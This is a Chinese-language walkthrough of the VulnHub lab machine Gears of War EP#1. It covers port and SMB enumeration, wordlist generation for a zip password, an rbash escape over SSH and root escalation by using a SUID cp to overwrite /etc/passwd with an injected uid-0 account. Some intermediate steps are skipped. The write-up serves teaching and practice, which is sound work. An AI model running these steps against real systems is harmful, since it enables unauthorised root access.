VulnHub-Gears-of-War-1

2023年12月15日08:50:14评论50 views字数 2184阅读7分16秒阅读模式

title: VulnHub-Gears-of-War-1
categories:
  - VulnHub
tags:
  - Linux
  - zip
  - CVE-2018-7600
  - gobuster
  - nmap
  - SMB
  - Samba
  - suid
  - smbmap
  - hydra
  - crunch
  - fcrackzip
cover: /images/Vulnhub.png

abbrlink: 8c8082bf

0x01 靶机介绍

Name: Gears of War: EP#1
Date release: 17 Oct 2019
Author: eDu809
Series: Gears of War
Description: Its a CTF machine that deals with the history of gears of war, where we must try to escape from prison and obtain root privileges. it has some rabbit holes, so you have to try to connect the tracksbrew to get access.

靶机下载地址：https://www.vulnhub.com/entry/gears-of-war-ep1%2C382/

0x02 侦查

端口探测

使用 nmap 进行端口扫描

nmap -p- -sV -sC -A 192.168.0.105 -oA nmap_Gears-of-War#1

VulnHub-Gears-of-War-1

扫描结果显示开放了22、80、139和445端口。

80端口

访问http://192.168.0.105后为战争图片

VulnHub-Gears-of-War-1 目录探测

使用 gobuster 对目录进行扫描，但未发现可疑目录

gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

VulnHub-Gears-of-War-1 SMB匿名登录

使用 smbmap 列出 SMB 共享，成功发现目录LOCUS_LAN$

smbmap -H 192.168.0.105

VulnHub-Gears-of-War-1

列出其中文件，成功找到SOS.txt和msg_horda.zip

smbmap -H 192.168.0.105 -R

VulnHub-Gears-of-War-1

使用 enum4linux 检查 SMB 服务

enum4linux 192.168.0.105

VulnHub-Gears-of-War-1

成功找到用户 marcus、root 等

enum4linux 192.168.0.105 -R | grep Local

VulnHub-Gears-of-War-1

0x03 上线[marcus]

ZIP密码破解

使用 smbclient 连接共享LOCUS_LAN$

smbclient //192.168.0.105/LOCUS_LAN$

通过 SMB 服务下载文件

smb > get SOS.txtsmb > get msg_horda.zip

VulnHub-Gears-of-War-1

查看文本并尝试解压压缩包，结果显示文本中存在密码，而压缩包解压需要密码，但经尝试后该密码并不是解压密码

cat SOS.txtunzip  msg_horda.zip

VulnHub-Gears-of-War-1

使用 crunch 生成4位密码字典

crunch 4 4 -t @%%, -o passwords

VulnHub-Gears-of-War-1

0x04 权限提升[root]

信息收集

登录后发现当前命令行为 rbash，即为受限制的bash，主要不能执行以下几种情况

1、使用命令cd更改目录2、设置或者取消环境变量的设置（SHELL, PATH, ENV, or BASH_ENV）3、指定包含参数'/'的文件名4、指定包含参数' - '的文件名5、使用重定向输出'>', '>>', '> |', '<>' '>&','&>'

由于存在诸多限制，因此需要尝试绕过，使用以下命令可进行绕过

ssh marcus@192.168.0.105 -t "bash -noprofile"

VulnHub-Gears-of-War-1

suid提权

查找带有 suid 的特权文件，在其中成功发现 cp 命令

find / -type f -perm -u=s 2>/dev/null

VulnHub-Gears-of-War-1

把/etc/passwd复制至/tmp目录下

cat /etc/passwdcat /etc/passwd > /tmp/passwd

VulnHub-Gears-of-War-1

使用 openssl 生成 mac 用户哈希

openssl passwd -1 -salt mac 123456

VulnHub-Gears-of-War-1

为新建的用户添加root用户组权限，同时添加至/tmp/passwd

mac:$1$mac$hKt6m/mS5roM05SKHksDf.:0:0:root:/root:/bin/bash

利用 cp 命令把/tmp/passwd替换为/etc/passwd

cp /tmp/passwd /etc/passwd

VulnHub-Gears-of-War-1

通过 su 命令切换至新用户 mac 并最终提权至 root 权限

su maccd ~

VulnHub-Gears-of-War-1

发现文件.flag.txt并成功拿到flag

ls -lacat .flag.txt

VulnHub-Gears-of-War-1

原文始发于微信公众号（狐狸说安全）：VulnHub-Gears-of-War-1

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

VulnHub-Gears-of-War-1

0x01 靶机介绍

0x02 侦查

端口探测

0x03 上线[marcus]

0x04 权限提升[root]

信息收集

suid提权

网络安全人士必知的MCP和A2A协议

第三方供应商遭勒索软件攻击，中国银行和星展银行11,200名客户受影响

低成本本地部署DeepSeek

PG_Vmdak

如何搭建符号执行环境并跑通第一个测试样例

渗透测试|柳暗花明(记一次有趣的高危漏洞以及思考修复方案)

从通过 .js 文件中找到的 URL 访问受限功能，到通过修改 API上HTTP响应中的accessLevel值进行权限提升

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

发表评论

在线咨询

微信